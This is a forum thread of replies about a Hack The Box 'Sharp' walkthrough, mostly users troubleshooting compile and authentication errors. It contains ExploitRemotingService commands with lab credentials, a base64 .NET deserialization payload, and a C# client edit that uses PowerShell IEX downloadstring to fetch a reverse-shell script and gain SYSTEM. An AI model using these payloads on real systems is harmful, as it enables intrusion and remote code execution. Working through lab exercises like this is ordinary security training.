TUTORIAL Sharp
by Eve01 - December 07, 2020 at 09:58 PM
#25
(December 10, 2020 at 01:45 PM)Kali76 Wrote:
(December 10, 2020 at 12:31 PM)CyberBandit Wrote:
(December 09, 2020 at 01:13 AM)Kali76 Wrote:
(December 09, 2020 at 01:07 AM)orangutang Wrote: Need to make exe file? And it work from windows machine?

need visual studio 2019 on windows and compile file

Any compilation errors??

I get, 

Severity Code Description Project File Line Suppression State

Error CS0246 The type or namespace name 'NDesk' could not be found (are you missing a using directive or an assembly reference?) ExploitRemotingService C:\Users\source\repos\ExploitRemotingService\ExploitRemotingService\Program.cs 18 Active

Severity Code Description Project File Line Suppression State
Error NuGet Package restore failed for project ExampleRemotingService: Unable to find version '0.2.1' of package 'NDesk.Options'.
  C:\Program Files\Microsoft SDKs\NuGetPackages\: Package 'NDesk.Options.0.2.1' is not found on source 'C:\Program Files\Microsoft SDKs\NuGetPackages\'.
  https://api.nuget.org/v3/index.json: Unable to load the service index for source https://api.nuget.org/v3/index.json.
  An error occurred while sending the request.
  The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.
  The remote certificate is invalid according to the validation procedure.
. Please see Error List window for detailed warnings and errors.


I tried both cloning the GIT and downloading the zip from https://github.com/tyranid/ExploitRemotingService

open this file with vs studio 2019 and compile:

ExploitRemotingService.csproj


\ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint  AAEAAAD/////
 
it only worked once now keep getting this error
Detected version 4 server
System.Security.Authentication.InvalidCredentialException: The server has rejected the client credentials. ---> System.ComponentModel.Win32Exception: The logon attempt failed
  --- End of inner exception stack trace ---

Server stack trace:
  at System.Net.Security.NegoState.ProcessReceivedBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.ProcessAuthentication(LazyAsyncResult lazyResult)
  at System.Net.Security.NegotiateStream.AuthenticateAsClient(NetworkCredential credential, String targetName, ProtectionLevel requiredProtectionLevel, TokenImpersonationLevel allowedImpersonationLevel)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateAuthenticatedStream(Stream netStream, String machinePortAndSid)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateSocketHandler(Socket socket, SocketCache socketCache, String machinePortAndSid)
  at System.Runtime.Remoting.Channels.SocketCache.GetSocket(String machinePortAndSid, Boolean openNew)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.SendRequestWithRetry(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
  at System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]:
  at System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
  at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
  at System.Object.ToString()
  at ExploitRemotingService.Program.CreateRemoteClassExploit(CustomChannel channel) in C:\ExploitRemotingService-master\ExploitRemotingService\Program.cs:line 356
  at ExploitRemotingService.Program.Main(String[] args) in C:\ExploitRemotingService-master\ExploitRemotingS
#26
(December 11, 2020 at 09:50 PM)B3Wild3R Wrote:
(December 11, 2020 at 09:11 PM)Kali76 Wrote:
(December 11, 2020 at 08:12 PM)B3Wild3R Wrote: For root, zip the wcf folder located in C:\Users\Lars\Documents\.

You can use Powershell and the "Compress-Archive" cmdlet
i.e.:
Compress-Archive -Path C:\Reference -DestinationPath C:\Archives\Draft.zip

Unpack the archive and open the solution in VS Studio.

Edit the client main function in the below section:


using RemotingSample;
using System;
using System.ServiceModel;

namespace Client {

    public class Client
    {
        public static void Main() {
            ChannelFactory<IWcfService> channelFactory = new ChannelFactory<IWcfService>(
                new NetTcpBinding(SecurityMode.Transport),"net.tcp://localhost:8889/wcf/NewSecretWcfEndpoint"
            );
            IWcfService client = channelFactory.CreateChannel();
            Console.WriteLine(client.GetDiskInfo());
            Console.WriteLine(client.GetCpuInfo());
            Console.WriteLine(client.GetRamInfo());
        }
    }
}

and add the following

Console.WriteLine(Client.InvokePowerShell(" iex (new-object net.webclient).downloadstring('http://yourip:port/Invoke-PowerShellTcpOneLine.ps1')"))
So that the above section reads as below:

            Console.WriteLine(client.GetDiskInfo());
            Console.WriteLine(client.GetCpuInfo());
            Console.WriteLine(client.GetRamInfo());
            Console.WriteLine(Client.InvokePowerShell(" iex (new-object net.webclient).downloadstring('http://yourip:port/Invoke-PowerShellTcpOneLine.ps1')"));

Compile the client and upload the client along with the DLL to the victim machine. Execute the client and you will get connection back from the victim machine and eventually spawn your reverse shell as SYSTEM.

ok thanks bro, how do i decompile with visual studio?  what if i use dnspy is the same? another thing, after I have recompiled all the files, including the .config, or is the dll enough?

You dont need to decompile the binary. You compress the wcf folder, uncompress it on your local machine, open the .sln file and edit the main function of the Client as I described earlier. Then build the solution and win :)

"client does not contain definition for InvokePowerShell" how to get this?
#27
Hi everybody again. On virtual machine (VMware player) with windows7 installed python, allowed it (net), switched off windows defender and firewall. But i got result: "System.Security.Authentication.InvalidCredentialException , Server denied client credentials, Login attempt failed". What is wrong?
#28
(December 12, 2020 at 09:53 AM)orangutang Wrote: Hi everybody again. On virtual machine (VMware player) with windows7 installed python, allowed it (net), switched off windows defender and firewall. But i got result: "System.Security.Authentication.InvalidCredentialException , Server denied client credentials, Login attempt failed". What is wrong?
same ................it's not even getting any req on my py server
can't even get result of user or ver command
#29
(December 12, 2020 at 06:24 AM)0x2019 Wrote:
(December 10, 2020 at 01:45 PM)Kali76 Wrote:
(December 10, 2020 at 12:31 PM)CyberBandit Wrote:
(December 09, 2020 at 01:13 AM)Kali76 Wrote:
(December 09, 2020 at 01:07 AM)orangutang Wrote: Need to make exe file? And it work from windows machine?

need visual studio 2019 on windows and compile file

Any compilation errors??

I get, 

Severity Code Description Project File Line Suppression State

Error CS0246 The type or namespace name 'NDesk' could not be found (are you missing a using directive or an assembly reference?) ExploitRemotingService C:\Users\source\repos\ExploitRemotingService\ExploitRemotingService\Program.cs 18 Active

Severity Code Description Project File Line Suppression State
Error NuGet Package restore failed for project ExampleRemotingService: Unable to find version '0.2.1' of package 'NDesk.Options'.
  C:\Program Files\Microsoft SDKs\NuGetPackages\: Package 'NDesk.Options.0.2.1' is not found on source 'C:\Program Files\Microsoft SDKs\NuGetPackages\'.
  https://api.nuget.org/v3/index.json: Unable to load the service index for source https://api.nuget.org/v3/index.json.
  An error occurred while sending the request.
  The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.
  The remote certificate is invalid according to the validation procedure.
. Please see Error List window for detailed warnings and errors.


I tried both cloning the GIT and downloading the zip from https://github.com/tyranid/ExploitRemotingService

open this file with vs studio 2019 and compile:

ExploitRemotingService.csproj


\ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint  AAEAAAD/////
 
it only worked once now keep getting this error
Detected version 4 server
System.Security.Authentication.InvalidCredentialException: The server has rejected the client credentials. ---> System.ComponentModel.Win32Exception: The logon attempt failed
  --- End of inner exception stack trace ---

Server stack trace:
  at System.Net.Security.NegoState.ProcessReceivedBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.ProcessAuthentication(LazyAsyncResult lazyResult)
  at System.Net.Security.NegotiateStream.AuthenticateAsClient(NetworkCredential credential, String targetName, ProtectionLevel requiredProtectionLevel, TokenImpersonationLevel allowedImpersonationLevel)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateAuthenticatedStream(Stream netStream, String machinePortAndSid)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateSocketHandler(Socket socket, SocketCache socketCache, String machinePortAndSid)
  at System.Runtime.Remoting.Channels.SocketCache.GetSocket(String machinePortAndSid, Boolean openNew)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.SendRequestWithRetry(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
  at System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]:
  at System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
  at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
  at System.Object.ToString()
  at ExploitRemotingService.Program.CreateRemoteClassExploit(CustomChannel channel) in C:\ExploitRemotingService-master\ExploitRemotingService\Program.cs:line 356
  at ExploitRemotingService.Program.Main(String[] args) in C:\ExploitRemotingService-master\ExploitRemotingS

Hi,
I have same problem...do you find possible solution ?
#30
It is impossible for me to compile the files. Always erros en ExploitRemotingService but ok for ExampleRemotingService...
Any one can explain if it is possible to download the .exe compiled?
#31
O
(December 13, 2020 at 08:48 PM)phneutro Wrote: It is impossible for me to compile the files. Always erros en ExploitRemotingService but ok for ExampleRemotingService...
Any one can explain if it is possible to download the .exe compiled?

https://github.com/theralfbrown/ExploitR...e-binaries
#32
Thanks a lot! That was exactly what I needed.
#33
Hi, when i'm running the command
ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint
i always get this error, what am i missing?

Error, couldn't detect version, using host: 4.0.30319.42000
Detected version 4 server
System.Security.Authentication.InvalidCredentialException: The server has rejected the client credentials. ---> System.ComponentModel.Win32Exception: The logon attempt failed
--- End of inner exception stack trace ---

Server stack trace:
at System.Net.Security.NegoState.ProcessReceivedBlob(Byte[] message, LazyAsyncResult lazyResult)
at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
at System.Net.Security.NegoState.ProcessAuthentication(LazyAsyncResult lazyResult)
at System.Net.Security.NegotiateStream.AuthenticateAsClient(NetworkCredential credential, String targetName, ProtectionLevel requiredProtectionLevel, TokenImpersonationLevel allowedImpersonationLevel)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateAuthenticatedStream(Stream netStream, String machinePortAndSid)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateSocketHandler(Socket socket, SocketCache socketCache, String machinePortAndSid)
at System.Runtime.Remoting.Channels.SocketCache.GetSocket(String machinePortAndSid, Boolean openNew)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.SendRequestWithRetry(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
at System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]:
at System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
at System.Object.ToString()
at ExploitRemotingService.Program.CreateRemoteClass()
at ExploitRemotingService.Program.Main(String[] args)
#34
I am trying to run this and getting error can someone help me? I am stuck here for too long now
My Command: .\ExampleRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAGEvYyAgcG93ZXJzaGVsbCAtYyBJRVgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzEwLjEwLjE0LjM6ODAwL3NoZWxsLnBzMScpBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=

Command Output:

Example .NET Remoting Server
Copyright © James Forshaw 2014
.NET Version: 4.0.30319.42000
Enable Transparent Proxy Fix: False
Custom Errors Mode: Off
Type Filter Level: Low
Any Bind: False
System.Net.Sockets.SocketException (0x80004005): An attempt was made to access a socket in a way forbidden by its access permissions
at System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress socketAddress)
at System.Net.Sockets.Socket.Bind(EndPoint localEP)
at System.Net.Sockets.TcpListener.Start(Int32 backlog)
at System.Runtime.Remoting.Channels.ExclusiveTcpListener.Start(Boolean exclusiveAddressUse)
at System.Runtime.Remoting.Channels.Tcp.TcpServerChannel.StartListening(Object data)
at System.Runtime.Remoting.Channels.Tcp.TcpServerChannel.SetupChannel()
at System.Runtime.Remoting.Channels.Tcp.TcpServerChannel..ctor(IDictionary properties, IServerChannelSinkProvider sinkProvider, IAuthorizeRemotingConnection authorizeCallback)
at System.Runtime.Remoting.Channels.Tcp.TcpChannel..ctor(IDictionary properties, IClientChannelSinkProvider clientSinkProvider, IServerChannelSinkProvider serverSinkProvider)
at ExampleRemotingService.Program.Main(String[] args) in C:\Users\Commando\Documents\ExploitRemotingService\ExampleRemotingService\Program.cs:line 107
#35
I am getting an error while running this command. Can anyone help me with this?
.\ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw AAEAAAD/////AQAAAAAAAAAMAgAAAE

error : 
System.InvalidCastException: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'System.Runtime.Remoting.Messaging.IMessage'.
  at System.Runtime.Remoting.Channels.CoreChannel.DeserializeBinaryRequestMessage(String objectUri, Stream inputStream, Boolean bStrictBinding, TypeFilterLevel securityLevel)
  at System.Runtime.Remoting.Channels.BinaryServerFormatterSink.ProcessMessage(IServerChannelSinkStack sinkStack, IMessage requestMsg, ITransportHeaders requestHeaders, Stream requestStream, IMessage& responseMsg, ITransportHeaders& responseHeaders, Stream& responseStream)
#36
(December 11, 2020 at 09:50 PM)B3Wild3R Wrote:
(December 11, 2020 at 09:11 PM)Kali76 Wrote:
(December 11, 2020 at 08:12 PM)B3Wild3R Wrote: For root, zip the wcf folder located in C:\Users\Lars\Documents\.

You can use Powershell and the "Compress-Archive" cmdlet
i.e.:
Compress-Archive -Path C:\Reference -DestinationPath C:\Archives\Draft.zip

Unpack the archive and open the solution in VS Studio.

Edit the client main function in the below section:


using RemotingSample;
using System;
using System.ServiceModel;

namespace Client {

    public class Client
    {
        public static void Main() {
            ChannelFactory<IWcfService> channelFactory = new ChannelFactory<IWcfService>(
                new NetTcpBinding(SecurityMode.Transport),"net.tcp://localhost:8889/wcf/NewSecretWcfEndpoint"
            );
            IWcfService client = channelFactory.CreateChannel();
            Console.WriteLine(client.GetDiskInfo());
            Console.WriteLine(client.GetCpuInfo());
            Console.WriteLine(client.GetRamInfo());
        }
    }
}

and add the following

Console.WriteLine(Client.InvokePowerShell(" iex (new-object net.webclient).downloadstring('http://yourip:port/Invoke-PowerShellTcpOneLine.ps1')"))
So that the above section reads as below:

            Console.WriteLine(client.GetDiskInfo());
            Console.WriteLine(client.GetCpuInfo());
            Console.WriteLine(client.GetRamInfo());
            Console.WriteLine(Client.InvokePowerShell(" iex (new-object net.webclient).downloadstring('http://yourip:port/Invoke-PowerShellTcpOneLine.ps1')"));

Compile the client and upload the client along with the DLL to the victim machine. Execute the client and you will get connection back from the victim machine and eventually spawn your reverse shell as SYSTEM.

ok thanks bro, how do i decompile with visual studio?  what if i use dnspy is the same? another thing, after I have recompiled all the files, including the .config, or is the dll enough?

You dont need to decompile the binary. You compress the wcf folder, uncompress it on your local machine, open the .sln file and edit the main function of the Client as I described earlier. Then build the solution and win :)

hey bro can you help me with this how i can transfer the wcf folder back to my system?

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Sharp walkthrough orangutang 0 273 April 11, 2021 at 12:54 PM
Last Post: orangutang
TUTORIAL Tutorial Get user Sharp hard machine sami92 6 1,200 March 31, 2021 at 04:04 AM
Last Post: sami92
TUTORIAL Sharp - hard box - very good writeup jenna_js 3 1,130 February 18, 2021 at 11:26 PM
Last Post: th3s3us

 Users browsing this thread: 1 Guest(s)